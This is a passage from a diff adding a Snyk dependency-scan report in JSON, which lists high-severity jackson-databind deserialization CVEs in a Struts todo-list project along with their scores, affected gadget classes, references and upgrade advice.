"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ 